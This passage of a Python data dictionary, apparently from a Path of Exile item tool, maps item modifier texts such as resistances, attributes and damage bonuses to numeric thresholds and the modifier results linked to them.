"#% increased Mine Damage": [(42, '(1 - 2)% increased Mine Laying Speed'), (100, '3% increased Mine Laying Speed')],
"#% increased Mine Laying Speed": [(20, '(1 - 2)% increased Mine Laying Speed'), (50, '3% increased Mine Laying Speed')],
"#% increased Physical Damage with Axes": [(42, '(3 - 4)% increased Physical Damage with Axes'), (100, '(5 - 6)% increased Physical Damage with Axes')],
"#% increased Physical Damage with Bows": [(42, '(3 - 4)% increased Physical Damage with Bows'), (100, '(5 - 6)% increased Physical Damage with Bows')],
"#% increased Physical Damage with Claws": [(42, '(3 - 4)% increased Physical Damage with Claws'), (100, '(5 - 6)% increased Physical Damage with Claws')],
"#% increased Physical Damage with Daggers": [(42, '(3 - 4)% increased Physical Damage with Daggers'), (100, '(5 - 6)% increased Physical Damage with Daggers')],
"#% increased Physical Damage with Maces": [(42, '(3 - 4)% increased Physical Damage with Maces'), (100, '(5 - 6)% increased Physical Damage with Maces')],
"#% increased Physical Damage with One Handed Melee Weapons": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Physical Damage with Staves": [(42, '(3 - 4)% increased Physical Damage with Staves'), (100, '(5 - 6)% increased Physical Damage with Staves')],
"#% increased Physical Damage with Swords": [(42, '(3 - 4)% increased Physical Damage with Swords'), (100, '(5 - 6)% increased Physical Damage with Swords')],
"#% increased Physical Damage with Two Handed Melee Weapons": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Physical Damage with Wands": [(42, '(3 - 4)% increased Physical Damage with Wands'), (100, '(5 - 6)% increased Physical Damage with Wands')],
"#% increased Physical Weapon Damage while Dual Wielding": [(36, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage')],
"#% increased Projectile Damage": [(30, '(1 - 2)% increased Projectile Speed'), (100, '(3 - 5)% increased Projectile Speed')],
"#% increased Projectile Speed": [(20, '(1 - 2)% increased Projectile Speed'), (50, '(3 - 5)% increased Projectile Speed')],
"#% increased Rarity of Items found": [(16, '(1 - 2)% increased Rarity of Items found'), (50, '(3 - 4)% increased Rarity of Items found')],
"#% increased Spell Damage": [(32, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage')],
"#% increased Spell Damage while Dual Wielding": [(42, '(3 - 4)% increased Spell Damage while Dual Wielding'), (100, '(5 - 6)% increased Spell Damage while Dual Wielding')],
"#% increased Spell Damage while holding a Shield": [(42, '(3 - 4)% increased Spell Damage while holding a Shield'), (100, '(5 - 6)% increased Spell Damage while holding a Shield')],
"#% increased Spell Damage while wielding a Staff": [(42, '(3 - 4)% increased Spell Damage while wielding a Staff'), (100, '(5 - 6)% increased Spell Damage while wielding a Staff')],
"#% increased Stun Duration on Enemies": [(28, '(2 - 3)% increased Stun Duration on Enemies'), (100, '(4 - 5)% increased Stun Duration on Enemies')],
"#% increased Stun and Block Recovery": [(28, '(6 - 7)% increased Stun and Block Recovery'), (100, '(3 - 5)% chance to Avoid being Stunned')],
"#% increased Totem Damage": [(42, '(1 - 2)% increased Totem Placement speed'), (100, '3% increased Totem Placement speed')],
"#% increased Totem Life": [(30, 'Totems gain 3 to all Elemental Resistances'), (100, 'Totems gain (4 - 5) to all Elemental Resistances')],
"#% increased Trap Damage": [(42, '(1 - 2)% increased Trap Throwing Speed'), (100, '3% increased Trap Throwing Speed')],
"#% increased Trap Throwing Speed": [(20, '(1 - 2)% increased Trap Throwing Speed'), (50, '3% increased Trap Throwing Speed')],
"#% increased Weapon Critical Strike Chance while Dual Wielding": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4)% increased Global Critical Strike Chance')],
"#% increased maximum Energy Shield": [(22, '(3 - 4) to maximum Energy Shield'), (50, '(5 - 6) to maximum Energy Shield')],
"#% increased maximum Life": [(17, '(3 - 4) to maximum Life'), (100, '(5 - 6) to maximum Life')],
"#% increased maximum Mana": [(20, '(2 - 3) to maximum Mana'), (50, '(4 - 5) to maximum Mana')],
"#% of Attack Damage Leeched as Life": [(0.8, '(3 - 4) to maximum Life'), (1.5, '0.2% of Attack Damage Leeched as Life')],
"#% of Damage taken gained as Mana over 4 seconds when Hit": [(7, '(2 - 3) to maximum Mana'), (20, '(5 - 7)% increased Mana Regeneration Rate')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.8, '(3 - 4) to maximum Energy Shield'), (1.67, '(5 - 6) to maximum Energy Shield')],
"#% of Life Regenerated per second": [(0.8, '(3 - 4) to maximum Life'), (1.67, '0.2% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(1.0, '(3 - 4) to maximum Life'), (5.0, '0.2% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(1.0, '(2 - 3) to maximum Mana'), (5.0, '0.1% of Physical Attack Damage Leeched as Mana')],
"#% reduced Mana Cost of Skills": [(11, '(2 - 3) to maximum Mana'), (50, '2% reduced Mana Cost of Skills')],
"#% reduced Physical Damage taken over time": [(4, '(-7 - -5) Physical Damage taken from Attacks'), (10, '(-10 - -8) Physical Damage taken from Attacks')],
"+# Energy Shield gained for each Enemy hit by your Attacks": [(5, '(3 - 4) to maximum Energy Shield'), (20, '(1 - 2) Energy Shield gained for each Enemy hit by your Attacks')],
"+# Life gained for each Enemy hit by your Attacks": [(7, '(3 - 4) to maximum Life'), (50, '(1 - 2) Life gained for each Enemy hit by your Attacks')],
"+# Mana gained for each Enemy hit by your Attacks": [(5, '(2 - 3) to maximum Mana'), (20, '1 Mana gained for each Enemy hit by your Attacks')],
"+# to Armour if you've Hit an Enemy Recently": [(800, '(3 - 4)% increased Armour'), (2000, '(5 - 6)% increased Armour')],
"+# to Dexterity": [(42, '(2 - 3) to Dexterity'), (100, '(4 - 5) to Dexterity')],
"+# to Dexterity and Intelligence": [(27, '(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(800, '(3 - 4)% increased Evasion Rating'), (2000, '(5 - 6)% increased Evasion Rating')],
"+# to Intelligence": [(42, '(2 - 3) to Intelligence'), (100, '(4 - 5) to Intelligence')],
"+# to Strength": [(42, '(2 - 3) to Strength'), (100, '(4 - 5) to Strength')],
"+# to Strength and Dexterity": [(27, '(2 - 3) to Strength\n(2 - 3) to Dexterity'), (100, '(4 - 5) to Strength\n(4 - 5) to Dexterity')],
"+# to Strength and Intelligence": [(27, '(2 - 3) to Strength\n(2 - 3) to Intelligence'), (100, '(4 - 5) to Strength\n(4 - 5) to Intelligence')],
"+# to all Attributes": [(20, '(2 - 3) to Strength\n(2 - 3) to Dexterity\n(2 - 3) to Intelligence'), (50, '(4 - 5) to Strength\n(4 - 5) to Dexterity\n(4 - 5) to Intelligence')],
"+#% Chance to Block Attack Damage while Dual Wielding": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Attack Damage while holding a Shield": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Attack Damage while wielding a Staff": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(4 - 6) Life gained when you Block')],
"+#% Chance to Block Spell Damage while Dual Wielding": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% Chance to Block Spell Damage while holding a Shield": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% Chance to Block Spell Damage while wielding a Staff": [(2, '(6 - 7)% increased Stun and Block Recovery'), (10, '(3 - 5) Mana gained when you Block')],
"+#% to Chaos Resistance": [(100, '(2 - 3) to Chaos Resistance')],
"+#% to Cold Resistance": [(35, '(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Cold Resistance')],
"+#% to Cold and Lightning Resistances": [(34, '(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Critical Strike Multiplier for Spells": [(35, '(2 - 3)% increased Spell Damage'), (100, '(4 - 5)% increased Spell Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier while Dual Wielding": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Cold Skills": [(48, '(2 - 3)% increased Cold Damage'), (100, '(4 - 5)% increased Cold Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Elemental Skills": [(35, '(2 - 3)% increased Elemental Damage'), (100, '(4 - 5)% increased Elemental Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Fire Skills": [(48, '(2 - 3)% increased Fire Damage'), (100, '(4 - 5)% increased Fire Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Lightning Skills": [(48, '(2 - 3)% increased Lightning Damage'), (100, '(4 - 5)% increased Lightning Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with One Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Critical Strike Multiplier with Two Handed Melee Weapons": [(48, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Fire Resistance": [(35, '(2 - 3) to Fire Resistance'), (100, '(4 - 5) to Fire Resistance')],
"+#% to Fire and Cold Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(34, '(2 - 3) to Fire Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(30, '2 to Global Critical Strike Multiplier'), (100, '(3 - 4) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(35, '(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Lightning Resistance')],
"+#% to Melee Critical Strike Multiplier": [(35, '(2 - 3)% increased Melee Damage'), (100, '(4 - 5)% increased Melee Damage\n(3 - 4) to Global Critical Strike Multiplier')],
"+#% to all Elemental Resistances": [(28, '(2 - 3) to Fire Resistance\n(2 - 3) to Cold Resistance\n(2 - 3) to Lightning Resistance'), (100, '(4 - 5) to Fire Resistance\n(4 - 5) to Cold Resistance\n(4 - 5) to Lightning Resistance')],
"Always Freezes Enemies on Hit": [(7, 'Always Freezes Enemies on Hit'), (50, 'Always Freezes Enemies on Hit')],
"Attacks have #% chance to cause Bleeding": [(8, 'Attacks have (1 - 2)% chance to cause Bleeding'), (50, 'Attacks have 3% chance to cause Bleeding')],
"Damage Penetrates #% Cold Resistance": [(2, '(2 - 3)% increased Cold Damage'), (5, '(4 - 5)% increased Cold Damage')],
"Damage Penetrates #% Elemental Resistances": [(2, '(2 - 3)% increased Elemental Damage'), (5, '(4 - 5)% increased Elemental Damage')],
"Damage Penetrates #% Fire Resistance": [(2, '(2 - 3)% increased Fire Damage'), (5, '(4 - 5)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(2, '(2 - 3)% increased Lightning Damage'), (5, '(4 - 5)% increased Lightning Damage')],
"Minions deal #% increased Damage": [(42, 'Minions deal (2 - 3)% increased Damage'), (100, 'Minions deal (4 - 5)% increased Damage')],
"Minions have #% increased Attack Speed": [(15, 'Minions have (1 - 2)% increased Attack Speed'), (50, 'Minions have 3% increased Attack Speed')],
"Minions have #% increased Cast Speed": [(15, 'Minions have (1 - 2)% increased Cast Speed'), (50, 'Minions have 3% increased Cast Speed')],
"Minions have #% increased maximum Life": [(30, 'Minions have (2 - 3)% increased maximum Life'), (100, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% Chance to Block Attack Damage": [(8, 'Minions have (2 - 3)% increased maximum Life'), (50, 'Minions have (4 - 5)% increased maximum Life')],
"Minions have +#% to all Elemental Resistances": [(25, 'Minions have 3 to all Elemental Resistances'), (100, 'Minions have (4 - 5) to all Elemental Resistances')],
"Totems gain +#% to all Elemental Resistances": [(25, 'Totems gain 3 to all Elemental Resistances'), (100, 'Totems gain (4 - 5) to all Elemental Resistances')],
},
"One Hand Axe": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
